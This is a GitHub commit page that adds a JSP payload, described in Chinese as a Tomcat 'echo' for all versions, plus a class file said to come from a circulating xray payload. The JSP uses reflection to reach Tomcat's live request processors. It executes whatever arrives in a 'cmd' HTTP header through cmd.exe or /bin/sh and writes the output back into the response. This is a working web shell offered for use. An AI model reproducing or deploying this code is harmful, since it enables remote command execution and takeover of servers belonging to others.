Skip to content

Commit 5d5bd55

Browse files
feihong-csfeihong-cs
authored
Add files via upload
更新tomcat全版本回显,优化代码逻辑,之前的逻辑存在瑕疵
1 parent c53a70f commit 5d5bd55

File tree

2 files changed

+85
-0
lines changed

2 files changed

+85
-0
lines changed

Tomcat/code/TomcatEcho-全版本.jsp

Lines changed: 85 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,85 @@
1+
<%@ page import="org.apache.tomcat.util.buf.ByteChunk" %>
2+
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
3+
<%
4+
boolean flag = false;
5+
ThreadGroup group = Thread.currentThread().getThreadGroup();
6+
java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
7+
f.setAccessible(true);
8+
Thread[] threads = (Thread[]) f.get(group);
9+
10+
for(int i = 0; i < threads.length; i++) {
11+
try{
12+
Thread t = threads[i];
13+
if (t == null) continue;
14+
15+
String str = t.getName();
16+
if (str.contains("exec") || !str.contains("http")) continue;
17+
18+
19+
f = t.getClass().getDeclaredField("target");
20+
f.setAccessible(true);
21+
Object obj = f.get(t);
22+
23+
if (!(obj instanceof Runnable)) continue;
24+
25+
f = obj.getClass().getDeclaredField("this$0");
26+
f.setAccessible(true);
27+
obj = f.get(obj);
28+
29+
try{
30+
f = obj.getClass().getDeclaredField("handler");
31+
}catch (NoSuchFieldException e){
32+
f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
33+
}
34+
f.setAccessible(true);
35+
obj = f.get(obj);
36+
37+
try{
38+
f = obj.getClass().getSuperclass().getDeclaredField("global");
39+
}catch(NoSuchFieldException e){
40+
f = obj.getClass().getDeclaredField("global");
41+
}
42+
f.setAccessible(true);
43+
obj = f.get(obj);
44+
45+
f = obj.getClass().getDeclaredField("processors");
46+
f.setAccessible(true);
47+
java.util.List processors = (java.util.List)(f.get(obj));
48+
49+
for(int j = 0; j < processors.size(); ++j) {
50+
Object processor = processors.get(j);
51+
f = processor.getClass().getDeclaredField("req");
52+
f.setAccessible(true);
53+
Object req = f.get(processor);
54+
Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
55+
56+
str = (String)req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
57+
58+
if (str != null && !str.isEmpty()) {
59+
resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
60+
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", str} : new String[]{"/bin/sh", "-c", str};
61+
byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
62+
63+
try {
64+
Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
65+
obj = cls.newInstance();
66+
cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
67+
resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
68+
} catch (NoSuchMethodException var5) {
69+
Class cls = Class.forName("java.nio.ByteBuffer");
70+
obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
71+
resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
72+
}
73+
74+
flag = true;
75+
}
76+
77+
if (flag) break;
78+
}
79+
80+
if (flag) break;
81+
}catch(Exception e){
82+
continue;
83+
}
84+
}
85+
%>

Tomcat/code/根据网上流传的xary payload提取的tomcat回显字节码文件.class

3.75 KB
Binary file not shown.

0 commit comments

Comments
 (0)